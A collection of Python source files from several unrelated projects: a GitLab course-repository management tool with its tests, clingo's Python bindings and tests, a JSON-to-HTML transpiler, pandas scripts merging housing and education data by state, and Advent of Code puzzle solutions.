} |
#### File: assigner/commands/init.py
```python
import logging
import datetime
from assigner.config import requires_config
from assigner.backends.gitlab import GitlabRepo
help = "Interactively initialize a new configuration"
logger = logging.getLogger(__name__)
def prompt(explanation, default=None):
prompt_string = ""
if default is not None:
prompt_string = "{} (default: {}): ".format(explanation, default)
else:
prompt_string = "{}: ".format(explanation)
value = input(prompt_string)
if value == "":
if default is not None:
return default
return prompt(explanation, default)
return value
def guess_semester():
now = datetime.datetime.now()
if now.month < 5:
semester = "SP"
elif now.month < 8:
semester = "SS"
else:
semester = "FS"
return "{}-{}".format(now.year, semester)
@requires_config
def init(conf, _):
conf["version"] = 3
conf["backend"] = {"name": "gitlab"}
conf["backend"]["host"] = "https://{}".format(
prompt("Gitlab server to use", "gitlab.com")
)
conf["backend"]["token"] = prompt(
"Gitlab access token (from {}/profile/personal_access_tokens)".format(
conf["backend"]["host"]
)
)
conf["semester"] = prompt(
"Year and semester, in the format YYYY-(FS|SP|SS)", guess_semester()
)
conf["namespace"] = prompt(
"Gitlab group to create repositories under",
"{}-CS1001".format(conf["semester"]),
)
do_create_group = input("Do you want to create this group on Gitlab? [y/N]: ")
if do_create_group.lower() == "y":
GitlabRepo.create_group(conf["namespace"], conf["backend"])
print("{} created!".format(conf["namespace"]))
do_canvas = input("Do you want to configure Canvas integration? [y/N]: ")
if do_canvas.lower() == "y":
conf["canvas-host"] = prompt("Canvas server to use (???.instructure.com)")
conf["canvas-token"] = prompt(
"Canvas access token (from {}/profile/settings)".format(conf["canvas-host"])
)
print("Congratulations, you're ready to go!")
def setup_parser(parser):
parser.set_defaults(run=init)
```
#### File: assigner/commands/lock.py
```python
import logging
from assigner import manage_repos
from assigner.backends.exceptions import (
UserInAssignerGroup,
UserNotAssigned,
)
help = "Lock students out of repos"
logger = logging.getLogger(__name__)
def lock(args):
"""Sets each student to Reporter status on their homework repository so
they cannot push changes, etc.
"""
#pylint: disable=no-value-for-parameter
return manage_repos(args, _lock)
def _lock(repo, student):
try:
repo.lock(student["id"])
return True
except UserInAssignerGroup:
logging.info("%s cannot be locked out because they are a member of the group, skipping...", student["username"])
return False
except UserNotAssigned:
logging.info("%s has not been assigned for %s", repo.name, student["username"])
return False
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to lock.")
parser.add_argument("--section", nargs="?",
help="Section to lock")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment needs locking.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=lock)
```
#### File: assigner/commands/set.py
```python
import logging
from assigner.config import requires_config
help = "Set configuration values"
logger = logging.getLogger(__name__)
@requires_config
def set_conf(conf, args):
"""Sets <key> to <value> in the config.
"""
conf[args.key] = args.value
def setup_parser(parser):
parser.add_argument("key", help="Key to set")
parser.add_argument("value", help="Value to set")
parser.set_defaults(run=set_conf)
```
#### File: assigner/commands/unarchive.py
```python
import logging
from assigner import manage_repos
help = "Unarchive repos"
logger = logging.getLogger(__name__)
def unarchive(args):
"""Unarchive each student repository so it will show back up in the project list.
"""
#pylint: disable=no-value-for-parameter
return manage_repos(args, lambda repo, _: repo.unarchive())
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to unarchive.")
parser.add_argument("--section", nargs="?",
help="Section to unarchive")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment to unarchive.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=unarchive)
```
#### File: assigner/commands/unprotect.py
```python
import logging
from assigner import manage_repos
help = "Unprotect a repo branch"
logger = logging.getLogger(__name__)
def unprotect(args):
"""Unprotect a branch in each student's repository so they can force push to it."""
for branch in args.branch:
logging.info("Unprotecting %s...", branch)
#pylint: disable=no-value-for-parameter, cell-var-from-loop
manage_repos(args, lambda repo, _: repo.unprotect(branch))
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to unprotect.")
parser.add_argument("--branch", "--branches", nargs="+", default=["master"],
help="Branch to unprotect.")
parser.add_argument("--section", nargs="?",
help="Section to unprotect")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment to unprotect.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=unprotect)
```
#### File: assigner/config/versions.py
```python
import jsonschema
import logging
from assigner.config.schemas import SCHEMAS
from assigner.config.upgrades import UPGRADES
logger = logging.getLogger(__name__)
class ValidationError(jsonschema.ValidationError):
pass
class VersionError(Exception):
pass
class UpgradeError(Exception):
pass
def validate(config, version=None):
if version is None:
version = get_version(config)
if version >= len(SCHEMAS):
raise VersionError(
"Configuration version %d is newer than latest known configuration version %d" % (version, len(SCHEMAS) - 1)
)
try:
jsonschema.validate(config, SCHEMAS[version])
except jsonschema.ValidationError as e:
raise ValidationError(e)
def get_version(config):
if "version" not in config:
# Pre-version tracking
if "token" in config:
return 0
return 1
return config["version"]
def upgrade(config):
current = get_version(config)
latest = len(SCHEMAS) - 1
if current > latest:
return config
if current != latest:
logger.info("Migrating configuration from version %d to version %d.", current, latest)
# Determine whether we should look for upgrade-caused
# validation errors. If the initial config doesn't validate,
# we can't tell whether upgrading has made things worse, but
# we'll try anyway.
try:
validate(config, current)
is_valid = True
except ValidationError:
is_valid = False
for version in range(current, latest):
config = UPGRADES[version](config)
# Upgrade validation.
# Upgrades should be rare, so we can afford to be very particular about them.
assert get_version(config) == version + 1
if is_valid:
try:
validate(config, version + 1)
except ValidationError as e:
# pylint: disable=bad-continuation
raise UpgradeError(
"""
Upgrading configuration from version %d to %d resulted in an invalid configuration:
%s
This is a bug. Please file an issue at https://github.com/redkyn/assigner/issues with your configuration.
Your original configuration has been restored.
""" % (version, version + 1, e.message)
)
return config
```
#### File: assigner/assigner/progress.py
```python
import enlighten
# prevent name shadowing
__enumerate = enumerate
def iterate(iterable):
return Progress(iterable)
def enumerate(iterable):
return __enumerate(iterate(iterable))
class Progress:
def __init__(self, iterable):
try:
total = len(iterable)
except (TypeError, AttributeError):
total = None
self.iterable = iterable
self.manager = enlighten.get_manager()
self.pbar = self.manager.counter(total=total)
def __iter__(self):
for item in self.iterable:
yield item
self.pbar.update()
self.manager.stop()
```
#### File: assigner/assigner/roster_util.py
```python
from assigner.backends.base import RepoError
from assigner.config import DuplicateUserError
import logging
logger = logging.getLogger(__name__)
def get_filtered_roster(roster, section, target):
if target:
roster = [s for s in roster if s["username"] == target]
elif section:
roster = [s for s in roster if s["section"] == section]
if not roster:
raise ValueError("No matching students found in roster.")
return roster
def add_to_roster(
conf, backend, roster, name, username, section, force=False, canvas_id=None
):
student = {
"name": name,
"username": username,
"section": section,
}
logger.debug("%s", roster)
if not force and any(filter(lambda s: s["username"] == username, roster)):
raise DuplicateUserError("Student already exists in roster!")
try:
student["id"] = backend.repo.get_user_id(username, conf.backend)
except RepoError:
logger.warning("Student %s does not have a Gitlab account.", name)
if canvas_id:
student["canvas-id"] = canvas_id
roster.append(student)
```
#### File: assigner/tests/assigner_test.py
```python
import itertools
from unittest.mock import patch
from assigner import main, make_parser, subcommands
from assigner.tests.utils import AssignerTestCase
from git.cmd import GitCommandNotFound
class MakeParserTestCase(AssignerTestCase):
def setUp(self):
self.mock_argparse = self._create_patch(
"assigner.argparse", autospec=True
)
self.mock_parser = self.mock_argparse.ArgumentParser.return_value
self.mock_subparser = self.mock_parser.add_subparsers.return_value
def test_creates_argument_parser(self):
"""
make_parser should create an ArgumentParser when called.
"""
make_parser()
self.assertTrue(self.mock_argparse.ArgumentParser.called)
def test_adds_all_subcommands(self):
"""
make_subparser should add all subcommands when called.
"""
make_parser()
flattened_calls = list(itertools.chain(*itertools.chain(
*self.mock_subparser.add_parser.call_args_list
)))
for command in subcommands:
self.assertIn(command, flattened_calls)
def test_add_default_help(self):
"""
make_subparser should add a default to print usage when caled.
"""
make_parser()
# NOTE: You can't compare lambdas made in different scopes
self.assertTrue(self.mock_parser.set_defaults.called)
self.assertFalse(self.mock_parser.print_usage.called)
mock_args = self.mock_parser.parse_args.return_value
mock_args.version = False
_, kwargs = self.mock_parser.set_defaults.call_args
kwargs['run'](mock_args)
self.assertTrue(self.mock_parser.print_usage.called)
class ExampleError(Exception):
pass
class MainTestCase(AssignerTestCase):
def setUp(self):
self.mock_configure = self._create_patch(
"assigner.configure_logging", autospec=True
)
self.mock_make_parser = self._create_patch(
"assigner.make_parser", autospec=True
)
self.mock_parser = self.mock_make_parser.return_value
self.mock_args = self.mock_parser.parse_args.return_value
self.mock_logging = self._create_patch(
"assigner.logging", autospec=True
)
def test_calls_make_parser(self):
"""
main calls parse_args on make_parser's returned parser.
"""
main([])
self.assertTrue(self.mock_parser.parse_args.called)
def test_calls_args_run(self):
"""
main calls args.run with args.
"""
main([])
self.mock_args.run.assert_called_once_with(self.mock_args)
def test_main_catches_exceptions(self):
"""
main should catch any exceptions and raise SystemExit.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = Exception
with self.assertRaises(SystemExit):
main([])
def test_main_raises_exceptions_with_traceback(self):
"""
main should raise exceptions if traceback is True.
"""
self.mock_args.tracebacks = True
self.mock_args.run.side_effect = ExampleError
with self.assertRaises(ExampleError):
main([])
@patch("assigner.logger", autospec=True)
def test_main_logs_exceptions(self, mock_logger):
"""
main should log exceptions when raised.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = ExampleError
try:
main([])
except SystemExit:
pass
mock_logger.error.assert_called_once_with(str(ExampleError()))
@patch("assigner.logger", autospec=True)
def test_main_logs_keyerror_with_catch(self, mock_logger):
"""
main should log a KeyError with "is missing" when raised.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = KeyError()
try:
main([])
except SystemExit:
pass
mock_logger.error.assert_called_once_with(
"%s is missing", self.mock_args.run.side_effect
)
@patch("assigner.logger", autospec=True)
def test_main_logs_gitcommandnotfound_with_catch(self, mock_logger):
"""
main should log a GitCommandNotFound with "git is not installed!" when raised.
"""
self.mock_args.tracebacks = False
self.mock_args.run.side_effect = GitCommandNotFound("git", "not installed!")
try:
main([])
except SystemExit:
pass
mock_logger.error.assert_called_once_with(
"git is not installed!"
)
def test_main_sets_verbosity(self):
"""
main should set verosity and level from args.
"""
main([])
mock_logger = self.mock_logging.getLogger.return_value
mock_logger.setLevel.assert_any_call(
self.mock_args.verbosity
)
``` |
{
"source": "joshessman-llnl/clingo",
"score": 3
} |
#### File: libpyclingo/clingo/core.py
```python
from typing import Callable, Tuple
from enum import Enum
from ._internal import _cb_error_panic, _ffi, _lib, _to_str
__all__ = [ 'Logger', 'MessageCode', 'TruthValue', 'version' ]
def version() -> Tuple[int, int, int]:
'''
Clingo's version as a tuple `(major, minor, revision)`.
'''
p_major = _ffi.new('int*')
p_minor = _ffi.new('int*')
p_revision = _ffi.new('int*')
_lib.clingo_version(p_major, p_minor, p_revision)
return p_major[0], p_minor[0], p_revision[0]
class MessageCode(Enum):
'''
Enumeration of messages codes.
'''
AtomUndefined = _lib.clingo_warning_atom_undefined
'''
Informs about an undefined atom in program.
'''
FileIncluded = _lib.clingo_warning_file_included
'''
Indicates that the same file was included multiple times.
'''
GlobalVariable = _lib.clingo_warning_global_variable
'''
Informs about a global variable in a tuple of an aggregate element.
'''
OperationUndefined = _lib.clingo_warning_operation_undefined
'''
Inform about an undefined arithmetic operation or unsupported weight of an
aggregate.
'''
Other = _lib.clingo_warning_atom_undefined
'''
Reports other kinds of messages.
'''
RuntimeError = _lib.clingo_warning_runtime_error
'''
To report multiple errors; a corresponding runtime error is raised later.
'''
VariableUnbounded = _lib.clingo_warning_variable_unbounded
'''
Informs about a CSP variable with an unbounded domain.
'''
Logger = Callable[[MessageCode, str], None]
@_ffi.def_extern(onerror=_cb_error_panic, name='pyclingo_logger_callback')
def _pyclingo_logger_callback(code, message, data):
'''
Low-level logger callback.
'''
handler = _ffi.from_handle(data)
handler(MessageCode(code), _to_str(message))
class TruthValue(Enum):
'''
Enumeration of the different truth values.
'''
False_ = _lib.clingo_external_type_false
'''
Represents truth value true.
'''
Free = _lib.clingo_external_type_free
'''
Represents absence of a truth value.
'''
True_ = _lib.clingo_external_type_true
'''
Represents truth value true.
'''
Release = _lib.clingo_external_type_release
'''
Indicates that an atom is to be released.
'''
```
#### File: clingo/tests/test_conf.py
```python
from unittest import TestCase
from clingo import Configuration, Control
class TestConfig(TestCase):
'''
Tests for configuration and statistics.
'''
def test_config(self):
'''
Test configuration.
'''
ctl = Control(['-t', '2'])
self.assertIn('solver', ctl.configuration.keys)
self.assertEqual(len(ctl.configuration.solver), 2)
self.assertIsInstance(ctl.configuration.solver[0], Configuration)
self.assertIsInstance(ctl.configuration.solver[0].heuristic, str)
self.assertIsInstance(ctl.configuration.solver[0].description('heuristic'), str)
ctl.configuration.solver[0].heuristic = 'berkmin'
self.assertTrue(ctl.configuration.solver[0].heuristic.startswith('berkmin'))
def test_simple_stats(self):
'''
Test simple statistics.
'''
ctl = Control(['-t', '2', '--stats=2'])
ctl.add('base', [], '1 { a; b }.')
ctl.ground([('base', [])])
ctl.solve()
stats = ctl.statistics
self.assertGreaterEqual(stats['problem']['lp']['atoms'], 2)
self.assertGreaterEqual(stats['solving']['solvers']['choices'], 1)
def test_user_stats(self):
'''
Test user statistics.
'''
def on_statistics(step, accu):
step['test'] = {'a': 0, 'b': [1, 2], 'c': {'d': 3}}
accu['test'] = step['test']
step['test'] = {'a': lambda a: a+1,
'e': lambda a: 4 if a is None else 0,
'b': [-1, 2, 3]}
self.assertEqual(len(step['test']), 4)
self.assertEqual(len(step['test']['b']), 3)
self.assertEqual(len(step['test']['c']), 1)
self.assertIn('a', step['test'])
self.assertEqual(sorted(step['test']), ['a', 'b', 'c', 'e'])
self.assertEqual(sorted(step['test'].keys()), ['a', 'b', 'c', 'e'])
self.assertEqual(sorted(step['test']['c'].items()), [('d', 3.0)])
self.assertEqual(sorted(step['test']['c'].values()), [3.0])
step['test']['b'][1] = 99
self.assertEqual(step['test']['b'][1], 99)
step['test']['b'].extend([3, 4])
step['test']['b'] += [3, 4]
ctl = Control(['-t', '2', '--stats=2'])
ctl.add('base', [], '1 { a; b }.')
ctl.ground([('base', [])])
ctl.solve(on_statistics=on_statistics)
stats = ctl.statistics
self.assertEqual(stats['user_step']['test'], {'a': 1.0,
'b': [-1.0, 99.0, 3.0, 3.0, 4.0, 3.0, 4.0],
'c': {'d': 3.0},
'e': 4.0})
self.assertEqual(stats['user_accu']['test'], {'a': 0, 'b': [1, 2], 'c': {'d': 3}})
``` |
{
"source": "joshf26/JSML",
"score": 3
} |
#### File: JSML/src/inputparser.py
```python
import json
from sys import stdout
from argparse import ArgumentParser, FileType
def parse_input(default_output_filename='index.html'):
argument_parser = ArgumentParser()
argument_parser.add_argument(
'input',
type=FileType('r'),
help='specify the input json file name',
)
argument_parser.add_argument(
'-o',
'--output',
type=FileType('w'),
help='specify the output html file name (default is "index.html")',
)
argument_parser.add_argument(
'-p',
'--print',
action='store_true',
help='print to stdout and skip writing to file',
)
args = argument_parser.parse_args()
data = json.load(args.input)
if args.print:
output_file = stdout
elif args.output is not None:
output_file = args.output
else:
output_file = open(default_output_filename, 'w')
return (
data,
output_file,
)
```
#### File: JSML/src/main.py
```python
from inputparser import parse_input
from transpile import transpile
def main():
data, output_file = parse_input()
html = transpile(data)
output_file.write(html)
if __name__ == '__main__':
main()
```
#### File: JSML/src/transpile.py
```python
from xml.etree.ElementTree import Element, tostring, ElementTree
DOCTYPE_HEADER = '<!DOCTYPE html>'
class JSMLError(Exception):
pass
def get_path(root, element):
parent_map = {child: parent for parent in ElementTree(root).iter() for child in parent}
path = [root]
current_element = element
while current_element is not root:
path.insert(1, current_element)
current_element = parent_map[current_element]
return path
def _check_type(data, key, value_type, root, parent, tag=None):
if key in data and not isinstance(data[key], value_type):
if parent is None:
raise JSMLError('Top level element\'s "{}" key must be a {} (not {}).'.format(
key,
value_type.__name__,
type(data[key]).__name__,
))
else:
raise JSMLError('Element with path "{} -> {}"\'s "{}" key must be a {} (not {}).'.format(
' -> '.join(element.tag for element in get_path(root, parent)),
tag if tag is not None else '?',
key,
value_type.__name__,
type(data[key]).__name__,
))
def transpile(data):
root = None
queue = [(data, None)]
while queue:
element_data, parent = queue.pop()
if isinstance(element_data, dict):
# Every element must have a "tag" key.
if 'tag' not in element_data:
if parent is None:
raise JSMLError('Top level element is missing "tag" key.')
else:
raise JSMLError('Element with path "{} -> ?" is missing "tag" key.'.format(
' -> '.join(element.tag for element in get_path(root, parent)),
))
# The "tag" key must be a string.
_check_type(element_data, 'tag', str, root, parent)
# The "attributes" key must be a dict.
_check_type(element_data, 'attributes', dict, root, parent, element_data['tag'])
# The "children" key must be a list.
_check_type(element_data, 'children', list, root, parent, element_data['tag'])
# Create the new element.
element = Element(
element_data['tag'],
element_data['attributes'] if 'attributes' in element_data else {},
)
# Append the element to its parent.
if parent is None:
root = element
else:
parent.append(element)
# Process the element's children.
if 'children' in element_data:
for child in element_data['children'][::-1]:
queue.append((child, element))
elif isinstance(element_data, str):
if parent is None:
# Edge case where entire document is only a string value.
return DOCTYPE_HEADER + element_data
else:
parent.text = element_data
else:
if parent is None:
raise JSMLError('Top level element is of invalid data type {}.'.format(
type(element_data).__name__,
))
else:
raise JSMLError('Element with path "{} -> ?" is of invalid data type {}.'.format(
' -> '.join(element.tag for element in get_path(root, parent)),
type(element_data).__name__,
))
return DOCTYPE_HEADER + tostring(root, encoding='unicode', method='html')
``` |
{
"source": "joshfgohunt/Capstone",
"score": 3
} |
#### File: joshfgohunt/Capstone/Transform_Data.py
```python
import pandas as pd
########### Add State Info ################
def add_state_abbrev(df, left):
us_state_abbrev = {
'Alabama': 'AL', 'Alaska': 'AK', 'Arizona': 'AZ', 'Arkansas': 'AR', 'California': 'CA', 'Colorado': 'CO',
'Connecticut': 'CT', 'Delaware': 'DE', 'Florida': 'FL', 'Georgia': 'GA', 'Hawaii': 'HI', 'Idaho': 'ID',
'Illinois': 'IL', 'Indiana': 'IN', 'Iowa': 'IA', 'Kansas': 'KS', 'Kentucky': 'KY', 'Louisiana': 'LA',
'Maine': 'ME', 'Maryland': 'MD', 'Massachusetts': 'MA', 'Michigan': 'MI', 'Minnesota': 'MN', 'Mississippi': 'MS',
'Missouri': 'MO', 'Montana': 'MT', 'Nebraska': 'NE', 'Nevada': 'NV', 'New Hampshire': 'NH', 'New Jersey': 'NJ',
'New Mexico': 'NM', 'New York': 'NY', 'North Carolina': 'NC', 'North Dakota': 'ND', 'Ohio': 'OH', 'Oklahoma': 'OK',
'Oregon': 'OR', 'Pennsylvania': 'PA', 'Rhode Island': 'RI', 'South Carolina': 'SC', 'South Dakota': 'SD',
'Tennessee': 'TN', 'Texas': 'TX', 'Utah': 'UT', 'Vermont': 'VT', 'Virginia': 'VA', 'Washington': 'WA',
'West Virginia': 'WV', 'Wisconsin': 'WI', 'Wyoming': 'WY', 'District of Columbia' : 'DC'}
us_abbr = pd.DataFrame.from_dict(us_state_abbrev, orient='index')
us_abbr = us_abbr.reset_index()
us_abbr.columns = ['State', 'Abbr']
right = 'State'
df = df.merge(us_abbr, how='inner', left_on=left, right_on=right)
return df
def add_state_region(df, left):
state_region = {'Alabama': 'Southern', 'Alaska': 'Western', 'Arizona': 'Western', 'Arkansas': 'Southern', 'California': 'Western', 'Colorado': 'Western',
'Connecticut': 'Northeastern', 'Delaware': 'Southern', 'Florida': 'Southern', 'Georgia': 'Southern', 'Hawaii': 'Western', 'Idaho': 'Western',
'Illinois': 'Midwestern', 'Indiana': 'Midwestern', 'Iowa': 'Midwestern', 'Kansas': 'Midwestern', 'Kentucky': 'Southern', 'Louisiana': 'Southern',
'Maine': 'Northeastern', 'Maryland': 'Southern', 'Massachusetts': 'Northeastern', 'Michigan': 'Midwestern', 'Minnesota': 'Midwestern', 'Mississippi': 'Southern',
'Missouri': 'Midwestern', 'Montana': 'Western', 'Nebraska': 'Midwestern', 'Nevada': 'Western', 'New Hampshire': 'Northeastern', 'New Jersey': 'Northeastern',
'New Mexico': 'Western', 'New York': 'Northeastern', 'North Carolina': 'Southern', 'North Dakota': 'Midwestern', 'Ohio': 'Midwestern', 'Oklahoma': 'Southern',
'Oregon': 'Western', 'Pennsylvania': 'Northeastern', 'Rhode Island': 'Northeastern', 'South Carolina': 'Southern', 'South Dakota': 'Midwestern',
'Tennessee': 'Southern', 'Texas': 'Southern', 'Utah': 'Western', 'Vermont': 'Northeastern', 'Virginia': 'Southern', 'Washington': 'Western',
'West Virginia': 'Southern', 'Wisconsin': 'Midwestern', 'Wyoming': 'Western', 'District of Columbia' : 'Southern'}
state_region = pd.DataFrame.from_dict(state_region, orient='index')
state_region = state_region.reset_index()
state_region.columns = ['State', 'Region']
right = 'State'
df = df.merge(state_region, how='outer', left_on=left, right_on=right)
return df
########### Consolidating Data ##########
### Location
def consolidate_sell_pop(location_house_sell_time, location_state_pop):
location_house_sell_time.columns = ['state', 'year', 'days_to_sell']
location_state_pop.columns = ['state', 'year', 'population']
merged_loc = location_house_sell_time.merge(location_state_pop, left_on= ['state', 'year'], right_on= ['state', 'year'], how='inner')
return merged_loc
def consolidate_sale_rent(location_rental_prices, location_house_prices):
location_rental_prices.columns = ['state', 'size', 'year', 'rent_value']
location_house_prices.columns = ['state', 'size', 'year', 'sell_value']
housing_merged_loc = location_rental_prices.merge(location_house_prices, left_on= ['state', 'size', 'year'], right_on= ['state', 'size', 'year'], how='inner')
return housing_merged_loc
def group_state_degree_data(df):
loc_field_focus = df.groupby(['State','Field'])['value'].sum().reset_index()
loc_field_focus_totals = df.groupby(['State'])['value'].sum().reset_index()
loc_field_focus_totals['Field'] = 'Total'
state_ratio = loc_field_focus.append(loc_field_focus_totals)
final =state_ratio.pivot_table(index = 'State', columns = 'Field', values = 'value')
final = append_zscores(final, 'Total', 'Total_z')
return final
def group_age_degree_data(df):
loc_age_focus = df.groupby(['Age Group','Field'])['value'].sum().reset_index()
loc_age_totals = df.groupby(['Age Group'])['value'].sum().reset_index()
loc_age_totals['Field'] = 'Total'
age_ratio = loc_age_focus.append(loc_age_totals)
final =age_ratio.pivot_table(index = 'Age Group', columns = 'Field', values = 'value')
final = append_zscores(final, 'Total', 'Total_z')
return final
def get_rent_sale_growth():
location_rental_prices = pd.read_csv('Final_Data/ETL/zillow_rental_prices.csv')
location_house_prices = pd.read_csv('Final_Data/ETL/zillow_house_prices.csv')
housing_merged_loc = consolidate_sale_rent(location_rental_prices, location_house_prices)
h_m_17 = housing_merged_loc[housing_merged_loc['year'] == 2017]
h_m_20 = housing_merged_loc[housing_merged_loc['year'] == 2020]
h_m_17 = h_m_17[['state','size','rent_value', 'sell_value']]
h_m_20 = h_m_20[['state','size','rent_value', 'sell_value']]
h_m_17_1 = h_m_17[h_m_17['size'] == '1br']
h_m_17_2 = h_m_17[h_m_17['size'] == '2br']
h_m_17_3 = h_m_17[h_m_17['size'] == '3br']
h_m_17_4 = h_m_17[h_m_17['size'] == '4br']
h_m_20_1 = h_m_20[h_m_20['size'] == '1br']
h_m_20_2 = h_m_20[h_m_20['size'] == '2br']
h_m_20_3 = h_m_20[h_m_20['size'] == '3br']
h_m_20_4 = h_m_20[h_m_20['size'] == '4br']
h_m_17_1 = h_m_17_1[['state', 'rent_value', 'sell_value']]
h_m_17_2 = h_m_17_2[['state', 'rent_value', 'sell_value']]
h_m_17_3 = h_m_17_3[['state', 'rent_value', 'sell_value']]
h_m_17_4 = h_m_17_4[['state', 'rent_value', 'sell_value']]
h_m_20_1 = h_m_20_1[['state', 'rent_value', 'sell_value']]
h_m_20_2 = h_m_20_2[['state', 'rent_value', 'sell_value']]
h_m_20_3 = h_m_20_3[['state', 'rent_value', 'sell_value']]
h_m_20_4 = h_m_20_4[['state', 'rent_value', 'sell_value']]
h_m_17_1.columns = ['state', 'rent_value_17_1', 'sell_value_17_1']
h_m_17_2.columns = ['state', 'rent_value_17_2', 'sell_value_17_2']
h_m_17_3.columns = ['state', 'rent_value_17_3', 'sell_value_17_3']
h_m_17_4.columns = ['state', 'rent_value_17_4', 'sell_value_17_4']
h_m_20_1.columns = ['state', 'rent_value_20_1', 'sell_value_20_1']
h_m_20_2.columns = ['state', 'rent_value_20_2', 'sell_value_20_2']
h_m_20_3.columns = ['state', 'rent_value_20_3', 'sell_value_20_3']
h_m_20_4.columns = ['state', 'rent_value_20_4', 'sell_value_20_4']
merged_rent_sale = h_m_17_1.merge(h_m_17_2, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_17_3, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_17_4, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_1, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_2, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_3, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_4, on='state', how='outer')
return merged_rent_sale
#### Degree
def combine_demand(education_industry_counts, education_deg_to_job, education_deg_payback,location_state_sex_deg ):
industry_demand = education_industry_counts.groupby('category')['Count'].sum().to_frame()
degree_fill_count = education_deg_to_job.groupby('category')['count'].sum().to_frame()
degree_mean = education_deg_payback.groupby('Category').mean()
degrees_completed = location_state_sex_deg.groupby('Field')['value'].sum().to_frame()
industry_demand = industry_demand.reset_index()
industry_demand.columns = ['Field', 'Demand_Count']
degree_fill_count = degree_fill_count.reset_index()
degree_fill_count.columns = ['Field', 'Degree_Fill_Count']
degree_mean = degree_mean.reset_index()
degree_mean.columns = ['Field', 'start_salary', 'mid_salary']
degrees_completed = degrees_completed.reset_index()
degrees_completed.columns = ['Field', 'bachelor_count']
dfs = industry_demand.merge(degree_fill_count, on='Field', how='inner')
dfs = dfs.merge(degree_mean, on='Field', how='inner')
dfs = dfs.merge(degrees_completed, on='Field', how='inner')
return dfs
def append_zscores(df, col, newcol):
df[newcol] = (df[col] - df[col].mean())/df[col].std()
return df
#### Education
def get_regional_salaries(reg_salaries):
reg_salaries = reg_salaries.groupby('Region').mean()
return reg_salaries
def get_bachelor_ratios(bachelor_counts):
bachelor_ratio = bachelor_counts.copy()
bachelor_ratio['Arts, Humanities and Others'] = bachelor_ratio['Arts, Humanities and Others']/bachelor_ratio['Total']
bachelor_ratio['Business'] = bachelor_ratio['Business']/bachelor_ratio['Total']
bachelor_ratio['Education'] = bachelor_ratio['Education']/bachelor_ratio['Total']
bachelor_ratio['Sci_Eng_Related'] = bachelor_ratio['Sci_Eng_Related']/bachelor_ratio['Total']
bachelor_ratio['Science and Engineering'] = bachelor_ratio['Science and Engineering']/bachelor_ratio['Total']
return bachelor_ratio
``` |
{
"source": "joshfinney/COVID-19-Data-Hub",
"score": 2
} |
#### File: joshfinney/COVID-19-Data-Hub/test_covid_data_handler.py
```python
from covid_data_handler import delete_update, hhmm_to_seconds, parse_csv_data, update_news, process_covid_csv_data, covid_API_request, schedule_covid_updates, get_updated, parse_json_data
from random import randint
import sched, time, logging
def test_all():
test_get_updated()
test_parse_csv_data()
test_process_covid_csv_data()
test_covid_API_request()
test_parse_json_data()
test_hhmm_to_seconds()
test_schedule_covid_updates()
test_update_news()
test_delete_update()
logging.info("COVID data handling test completed")
def test_get_updated():
assert isinstance(get_updated(),bool)
def test_parse_csv_data():
data = parse_csv_data('nation_2021-10-28.csv')
assert len(data) == 639
def test_process_covid_csv_data():
last7days_cases , current_hospital_cases , total_deaths = process_covid_csv_data (parse_csv_data('nation_2021-10-28.csv'))
assert str(last7days_cases) == "240299"
assert str(current_hospital_cases) == "7019"
assert str(total_deaths) == "141544"
def test_covid_API_request():
data = covid_API_request(location='Exeter',location_type='ltla')
assert isinstance(data, dict)
def test_parse_json_data():
assert isinstance(parse_json_data(covid_API_request(location='Exeter',location_type='ltla'),0),dict)
def test_hhmm_to_seconds():
test_time_input_1 = randint(0,23)
test_time_input_2 = randint(0,59)
test_time:str
if test_time_input_1 < 10:
test_time = "0" + str(test_time_input_1) + ":"
else:
test_time = str(test_time_input_1) + ":"
if test_time_input_2 < 10:
test_time = test_time + "0" + str(test_time_input_1)
else:
test_time = test_time + str(test_time_input_1)
assert isinstance(hhmm_to_seconds(test_time), int)
def test_schedule_covid_updates():
schedule_covid_updates(update_interval=10, update_name='update test',location='Exeter',location_type='ltla')
def test_update_news():
update_news()
def test_delete_update():
delete_update("Exeter COVID-19 data update")
logging.basicConfig(
filename='logging.log',
level=logging.INFO,
format='%(asctime)s:%(levelname)s:%(message)s'
)
test_scheduler = sched.scheduler(time.time,time.sleep)
test_scheduler.enter(60*60,1,test_all)
test_scheduler.run
``` |
{
"source": "joshfinnie/advent-of-code",
"score": 3
} |
#### File: 2020/day-01/part2.py
```python
import sys
def get_values(arr):
sum = 2020
for i in arr:
for j in arr:
for z in arr:
if i + j + z == sum:
return i * j * z
values = []
with open(sys.argv[1]) as inputfile:
for lines in inputfile:
values.append(int(lines))
print(get_values(values))
```
#### File: 2020/day-03/part1.py
```python
import sys
def get_answer(arr):
tree_count = 0
x_pos = 0
y_pos = 0
x_offset = 1
y_offset = 3
width = len(arr[0])
height = len(arr)
while x_pos < height:
test = arr[x_pos][y_pos]
if test == "#":
tree_count += 1
x_pos = x_pos + x_offset
y_pos = (y_pos + y_offset) % width
return tree_count
with open(sys.argv[1]) as f:
print(get_answer([l.strip() for l in f if l.strip()]))
```
#### File: 2020/day-05/part2.py
```python
import sys
def get_answers(arr):
possible_seats = set(range(1024))
for a in arr:
a = a.replace("F", "0").replace("B", "1")
a = a.replace("R", "1").replace("L", "0")
seat = int(a, 2)
possible_seats.remove(seat)
for seat in possible_seats:
if seat - 1 not in possible_seats and seat + 1 not in possible_seats:
return seat
with open(sys.argv[1]) as f:
arr = [l.strip() for l in f if l.strip()]
print(get_answers(arr))
